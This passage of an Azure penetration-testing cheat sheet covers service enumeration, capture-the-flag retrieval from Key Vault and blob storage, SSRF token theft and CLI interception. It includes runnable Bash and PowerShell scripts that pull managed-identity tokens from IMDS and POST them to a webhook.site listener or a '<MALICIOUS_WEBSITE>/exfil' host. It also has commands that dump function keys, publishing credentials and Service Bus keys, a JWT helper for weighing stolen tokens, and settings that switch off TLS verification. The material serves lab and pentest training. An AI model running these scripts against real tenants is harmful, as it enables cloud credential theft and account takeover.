az functionapp function list -o table \
  --query "[].{Name:name, Trigger:config.bindings[0].type, Queue:config.bindings[0].queueName, Script:config.scriptFile,functionDirectory:config.functionDirectory,Language:language,href:href}" \
  --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP
```

Get details about the source of the function code

```bash
az functionapp deployment source show \
--name $FUNCTION_NAME --resource-group $RESOURCE_GROUP  
```

Retrieve the publishing profiles for a specific Azure Function App

```bash
az functionapp deployment list-publishing-profiles --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP
```

Get SCM credentials

```bash
az functionapp deployment list-publishing-credentials --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP
```

Get function, system and master keys

```bash
az functionapp keys list --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP 
```

### Static Web Apps

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-static-web-apps.html#enumeration)

```bash
az staticwebapp list --query "[].{Name:name, ResourceGroup:resourceGroup, Hostname:defaultHostname, PublicAccess:publicNetworkAccess, SKU:sku.name, Identity:identity, KeyVaultId:keyVaultReferenceIdentity, ConfigUpdates:allowConfigFileUpdates, StagingPolicy:stagingEnvironmentPolicy, Backends:linkedBackends}" --output table
```

Get appsettings

```bash
az staticwebapp appsettings list --name $WEBAPP_NAME
```

Get env information

```bash
az staticwebapp environment list --name $WEBAPP_NAME
az staticwebapp environment functions --name $WEBAPP_NAME
az staticwebapp secrets list --name $WEBAPP_NAME
```

Get current snippets

```bash
az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Web/staticSites/$WEBAPP_NAME/snippets?api-version=2022-03-01"
```

Get database connections

```bash
az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Web/staticSites/$WEBAPP_NAME/databaseConnections?api-version=2021-03-01"
```

### Azure Container Registry (ACR)

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration)

```bash
az acr list --query "[].{Name:name,loginServer:loginServer, AdminUser:adminUserEnabled, PublicAccess:publicNetworkAccess, AnonPull:anonymousPullEnabled, SKU:sku.tier, TrustPolicy:policies.trustPolicy.status, Encryption:encryption.status, resourceGroup:resourceGroup}" --output table
```

List of all authentication tokens

```bash
az acr token list --registry $ACR_NAME --resource-group $RESOURCE_GROUP
```

Retrieve recently deleted repositories

```bash
az acr repository list-deleted --name $ACR_NAME 
```

Retrieve active repositories

```bash
az acr repository list --name $ACR_NAME --resource-group $RESOURCE_GROUP
```

List tasks runs

```bash
az acr task list --output table \
  --query "[].{Name:name, Identity:identity.type, Source:step.contextPath, Schedule:trigger.timerTriggers[0].schedule, Status:status, imageName:step.imageNames}"  \
   --registry $ACR_NAME 
```

### Azure Container Instances

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.html#enumeration)

```bash
az container list --query "[].{Name:name, ResourceGroup:resourceGroup, FQDN:ipAddress.fqdn, PublicIP:ipAddress.ip, Port:ipAddress.ports[0].port, Identity:identity.type, Image:containers[0].image, OS:osType, Registry:imageRegistryCredentials[0].server}" --output json
```

### Queue Storage

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-queue.html#enumeration)

```bash
az storage account list --query "[].{Name:name, ResourceGroup:resourceGroup, PublicBlob:allowBlobPublicAccess, SharedKey:allowSharedKeyAccess, NetDefaultAction:networkRuleSet.defaultAction, PublicNetwork:publicNetworkAccess, MinTLS:minimumTlsVersion, OAuthOnly:defaultToOAuthAuthentication}" -o table
```

```bash
az storage queue list --account-name $STORAGE_ACCOUNT_NAME [--auth-mode login]
```

### Automation Accounts

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-automation-accounts.html#enumeration)

```bash
az automation account list --output json --query "[].{name:name,description:description,publicNetworkAccess:publicNetworkAccess,privateEndpointConnections:privateEndpointConnections,disableLocalAuth:disableLocalAuth,identity:identity}"
```

Get the registration keys of the automation account. These are used to register DSC nodes and Hybrid Runbook Workers.

```bash
az automation account list-keys --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP
```

Get schedules of automation account

```bash
az automation schedule list --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP
```

Get jobs of an automation account

```bash
az automation job list --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP
```

Get runbooks of an automation account

```bash
az automation runbook list --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP
```

Get runbook content

```bash
az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/runbooks/$RUNBOOK_NAME/content?api-version=2023-11-01"
```

Get variables of automation account. It's possible to get the value of unencrypted variables but not the encrypted ones.

```bash
az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/variables?api-version=2023-11-01"
```

Get credentials of automation account

```bash
az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/credentials?api-version=2023-11-01"
```

Get the details of one credential (name, description, username). The password is never returned by the API; it can only be read from inside a runbook.

```bash
az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/credentials/$CREDENTIAL_NAME?api-version=2023-11-01"
```

### Service Bus

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-servicebus.html#enumeration)

```bash
az servicebus namespace list -o table --query "[].{name:name,publicNetworkAccess:publicNetworkAccess,serviceBusEndpoint:serviceBusEndpoint,disableLocalAuth:disableLocalAuth,resourceGroup:resourceGroup}"
```

Namespace Enumeration

```bash
az servicebus namespace network-rule-set list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME
az servicebus namespace private-endpoint-connection list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME
az servicebus namespace exists --name $BUS_NAME
```

Authorization Rule Enumeration (the keys command needs the rule name from the first listing)

```bash
az servicebus namespace authorization-rule list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME --query "[].{name:name,rights:rights}"
az servicebus namespace authorization-rule keys list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME --name $RULE_NAME
```

Queue Enumeration

```bash
az servicebus queue list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME 
```

Topic Enumeration

```bash
az servicebus topic list \
  --resource-group $RESOURCE_GROUP \
  --namespace-name $BUS_NAME \
  --query "[].{TopicName:name, Status:status, ActiveMsgs:countDetails.activeMessageCount, DeadLetterMsgs:countDetails.deadLetterMessageCount, Partitioning:enablePartitioning}" \
  --output table
```

Subscription Enumeration

```bash
az servicebus topic subscription list \
  --resource-group $RESOURCE_GROUP \
  --namespace-name $BUS_NAME \
  --topic-name $TOPIC_NAME \
  --query "[].{Subscription:name, Status:status, ActiveCount:countDetails.activeMessageCount, DeadLetterCount:countDetails.deadLetterMessageCount, RequiresSession:requiresSession}" \
  --output table
```

### Logic Apps

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-logic-apps.html#enumeration)

### Virtual Desktop

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-virtual-desktop.html#enumeration)

```bash
az desktopvirtualization hostpool list \
  --query "[].{Name:name, description:description, ResourceGroup:resourceGroup, Type:hostPoolType, LBType:loadBalancerType, MaxSessions:maxSessionLimit, AADJoin:customRdpProperty}" \
  --output table
```

### Monitoring Logs

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-monitoring.html#enumeration)

## Get The Flag

### KeyVault

```bash
KEYVAULT_NAME=$(az keyvault list --query "[0].name" -o tsv)
SECRET_NAME=$(az keyvault secret list --vault-name "$KEYVAULT_NAME" --query "[0].name" -o tsv)
az keyvault secret show --vault-name "$KEYVAULT_NAME" --name "$SECRET_NAME"
```

### Blob

```bash
STORAGE_ACCOUNT_NAME=$(az storage account list --resource-group iam-azure-labs --query "[0].name" -o tsv)
az storage container list \
--account-name $STORAGE_ACCOUNT_NAME \
--auth-mode login
az storage blob download \
--account-name $STORAGE_ACCOUNT_NAME \
--container-name flag \
--name flag.txt \
--file flag.txt \
--auth-mode login
cat flag.txt
```

## SSRF

[More Azure SSRF Information](https://hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm)

### Obtain tokens

Manual

```bash
HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
echo "Instance details"
curl -s -f -H "$HEADER" "$URL/instance?api-version=$API_VERSION"
echo "Load Balancer details"
curl -s -f -H "$HEADER" "$URL/loadbalancer?api-version=$API_VERSION"
echo "Management Token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://management.azure.com/"
echo "Graph token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://graph.microsoft.com/"
echo "Vault token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://vault.azure.net/"
echo "Storage token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://storage.azure.com/"
```

**Bash**: Exfiltrate all the tokens

```bash
IMDS="http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource="
EXFIL_URL="https://webhook.site/9f90f8a5-2218-4da7-8810-4d9244530223"   # replace with your own listener
json="{"
for res in "https://management.azure.com/" "https://graph.microsoft.com/" "https://vault.azure.net/" "https://storage.azure.com/"; do
  token=$(curl -s -f -H "Metadata:true" "${IMDS}${res}" | sed -n 's/.*"access_token":"\([^"]*\)".*/\1/p')
  json+="\"$res\":\"$token\","
done
json="${json%,}}"   # drop the trailing comma and close the JSON object
curl -s -X POST -H "Content-Type: application/json" -d "$json" "$EXFIL_URL"
```

**PowerShell**: Exfiltrate all the tokens

```powershell
$h = @{ Metadata = 'true' }
$u = 'http://169.254.169.254/metadata/identity/oauth2/token'
$v = '2018-02-01'
$r = @('https://management.azure.com/', 'https://graph.microsoft.com/', 'https://vault.azure.net/', 'https://storage.azure.com/')
$tokens = @{}
$r | % { $tokens[$_] = (Invoke-RestMethod -Uri "$u`?api-version=$v&resource=$_" -Headers $h -Method Get).access_token }
Invoke-WebRequest -Uri "https://<MALICIOUS_WEBSITE>/exfil" -Method POST -Body ($tokens | ConvertTo-Json) -ContentType 'application/json'
```

#### App Service, Functions and Automation Accounts

These sandboxes do not expose IMDS at 169.254.169.254. Instead the managed identity is reached through a local endpoint whose URL and per-instance secret are in the **`IDENTITY_ENDPOINT`** and **`IDENTITY_HEADER`** environment variables (check `env`). Send the secret in the `X-IDENTITY-HEADER` header and ask for a token for the resource you want.

```bash
TOKEN=$(wget -qO- --header "X-IDENTITY-HEADER: $IDENTITY_HEADER" "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2019-08-01" | python3 -c 'import json,sys; print(json.load(sys.stdin)["access_token"])')
```
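One helper that works in both environments, as an added example that is not part of the original page or of any Azure tool: it picks the IMDS endpoint (VMs) or the `IDENTITY_ENDPOINT`/`IDENTITY_HEADER` pair (App Service, Functions, Automation) from the environment, and decodes the returned JWT so you can see which identity (`oid`, `appid`, `xms_mirid`), audience (`aud`) and lifetime (`exp`) a token actually carries before you spend or exfiltrate it. The demo at the bottom uses a constructed, unsigned token whose UUIDs and resource id are placeholders; `get_token` only returns something when run inside an Azure workload.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): token fetcher for both the IMDS
# path and the local managed-identity endpoint, plus a JWT decoder. Uses only
# curl, sed, cut, tr and base64.

# Pick URL and auth header from the environment we are running in.
msi_token_url() {   # msi_token_url RESOURCE -> URL that issues a token for RESOURCE
  if [ -n "${IDENTITY_ENDPOINT:-}" ]; then
    printf '%s?api-version=2019-08-01&resource=%s\n' "$IDENTITY_ENDPOINT" "$1"
  else
    printf 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=%s\n' "$1"
  fi
}
msi_token_header() {   # header that proves the request originates inside the workload
  if [ -n "${IDENTITY_ENDPOINT:-}" ]; then
    printf 'X-IDENTITY-HEADER: %s\n' "${IDENTITY_HEADER:-}"
  else
    printf 'Metadata: true\n'
  fi
}

# Extract one top-level value (string or number) from a flat JSON object on stdin.
json_value() {   # json_value KEY
  sed -n 's/.*"'"$1"'":"\{0,1\}\([^",}]*\).*/\1/p'
}

# base64url decode: JWT segments are unpadded and use -_ instead of +/.
b64url_decode() {
  s=$(printf '%s' "$1" | tr '_-' '/+')
  case $(( ${#s} % 4 )) in 2) s="$s==" ;; 3) s="$s=" ;; esac
  printf '%s' "$s" | base64 -d
}
jwt_payload() { b64url_decode "$(printf '%s' "$1" | cut -d. -f2)"; }
jwt_claim()   { jwt_payload "$1" | json_value "$2"; }   # jwt_claim TOKEN CLAIM

# Request a token for RESOURCE from whichever identity endpoint is present.
get_token() { curl -s -f -H "$(msi_token_header)" "$(msi_token_url "$1")" | json_value access_token; }

# What is this token good for: audience, identity, managed-identity resource, TTL.
token_summary() {   # token_summary TOKEN
  now=$(date +%s); exp=$(jwt_claim "$1" exp)
  printf 'aud=%s\noid=%s\nappid=%s\nxms_mirid=%s\nexpires_in=%ss\n' \
    "$(jwt_claim "$1" aud)" "$(jwt_claim "$1" oid)" "$(jwt_claim "$1" appid)" \
    "$(jwt_claim "$1" xms_mirid)" "$(( exp - now ))"
}

# --- Offline demo with a CONSTRUCTED, unsigned token (placeholder values only) ---
b64url_encode() { base64 | tr -d '\n=' | tr '/+' '_-'; }
SAMPLE_PAYLOAD='{"aud":"https://management.azure.com/","oid":"11111111-1111-1111-1111-111111111111","appid":"22222222-2222-2222-2222-222222222222","xms_mirid":"/subscriptions/00000000-0000-0000-0000-000000000000/resourcegroups/rg/providers/Microsoft.Compute/virtualMachines/vm1","exp":'"$(( $(date +%s) + 3600 ))"'}'
SAMPLE_JWT="$(printf '%s' '{"alg":"none","typ":"JWT"}' | b64url_encode).$(printf '%s' "$SAMPLE_PAYLOAD" | b64url_encode).sig"
token_summary "$SAMPLE_JWT"
# Inside a real workload: TOKEN=$(get_token https://management.azure.com/) && token_summary "$TOKEN"
```

`aud` tells you which API the token can be presented to (a vault token is useless against ARM), `xms_mirid` which managed identity resource it was issued for, and a short `expires_in` means you should grab a fresh one right before you need it rather than the one you exfiltrated earlier.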

### Bash

Examples:

**Curl**

```bash
# Obtain a token 
ACCESS_TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq -r .access_token)

# Perform a request to the Azure API
curl -s -X GET "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Compute/virtualMachines/$VM_NAME?api-version=2023-03-01"  -H "Authorization: Bearer $ACCESS_TOKEN" | jq .identity
```

**Wget**

```bash
# Obtain a token
TOKEN=$(wget -qO- --header "X-IDENTITY-HEADER: $IDENTITY_HEADER" "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2019-08-01" | python3 -c 'import json,sys; print(json.load(sys.stdin)["access_token"])')


wget -qO- --header "Authorization: Bearer $TOKEN" "https://$VAULT_NAME.vault.azure.net/secrets/$SECRET_NAME?api-version=2016-10-01"
```

### PowerShell

Examples

```powershell
$armToken = Invoke-RestMethod `
  -Headers @{Metadata="true"} `
  -Method GET `
  -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Verify the token was received
echo $armToken.access_token

# 1. Grab the subscription ID from the instance metadata
$instanceInfo = Invoke-RestMethod -Headers @{Metadata="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
$subId = $instanceInfo.compute.subscriptionId

# 2. Define the ARM API endpoint for Key Vaults
$uri = "https://management.azure.com/subscriptions/$subId/providers/Microsoft.KeyVault/vaults?api-version=2023-07-01"

# 3. Query the endpoint
$headers = @{Authorization = "Bearer $($armToken.access_token)"}
$vaults = Invoke-RestMethod -Method GET -Headers $headers -Uri $uri

# 4. Display the results cleanly
$vaults.value | Select-Object name, resourceGroup, location

$token = Invoke-RestMethod `
  -Headers @{Metadata="true"} `
  -Method GET `
  -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net"
echo "ACCESS_TOKEN=$($token.access_token)"

$secrets = Invoke-RestMethod -Method GET -Headers @{Authorization = "Bearer $($token.access_token)"} -Uri "https://$($vaults.value.name).vault.azure.net/secrets?api-version=7.4"
$flagName = ($secrets.value | Where-Object { $_.id -match "flag" }).id
echo "FLAG_URI=$($flagName)"
(Invoke-RestMethod -Headers @{"Authorization"="Bearer $($token.access_token)"} -URI "$($flagName)?api-version=7.4").value | Out-String
```

## MiTM

Route the Azure CLI through an intercepting proxy listening on 127.0.0.1:8080. First fetch the proxy's CA certificate (`/cert` on the listener is where Burp serves it) and convert it to PEM, then point the CLI's Python HTTP stack at that bundle and at the proxy:

```bash
wget http://127.0.0.1:8080/cert -O ~/Downloads/cacert.der
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM

export REQUESTS_CA_BUNDLE="$HOME/Downloads/cacert.pem"
export PYTHONWARNINGS="ignore:Unverified HTTPS request"
export ADAL_PYTHON_SSL_NO_VERIFY=1
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
export HTTPS_PROXY="http://127.0.0.1:8080"
export HTTP_PROXY="http://127.0.0.1:8080"
```

## Tools

* [azure-cli-mitm](https://github.com/Marmeus/azure-cli-mitm): Proxy to intercept Azure CLI REST communications and append or modify `Authorization` Bearer tokens per Azure service domain.
* [AzurePEAS](https://github.com/peass-ng/CloudPEASS): Enumerates the principals permissions within your Azure and Entra ID environments, with a special focus on detecting privilege escalation pathways and identifying potential security risks.
* [CloudSploit](https://github.com/aquasecurity/cloudsploit): Open-source project designed to allow detection of security risks in cloud infrastructure accounts.
* [Cloudfox](https://github.com/BishopFox/cloudfox): Helps you gain situational awareness in unfamiliar cloud environments.
* [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest#install)
* [Azure PowerShell AZ Module](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell?view=azps-15.5.0)
* [Microsoft Graph PowerShell](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation?view=graph-powershell-1.0)
* [PowerShell In Linux](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-enumeration-tools.html#install-powershell-in-linux)
* [Install the sqlcmd and bcp](https://learn.microsoft.com/en-us/sql/linux/sql-server-linux-setup-tools?view=sql-server-ver17\&tabs=ubuntu-install%2Codbc-ubuntu-2204#ubuntu)

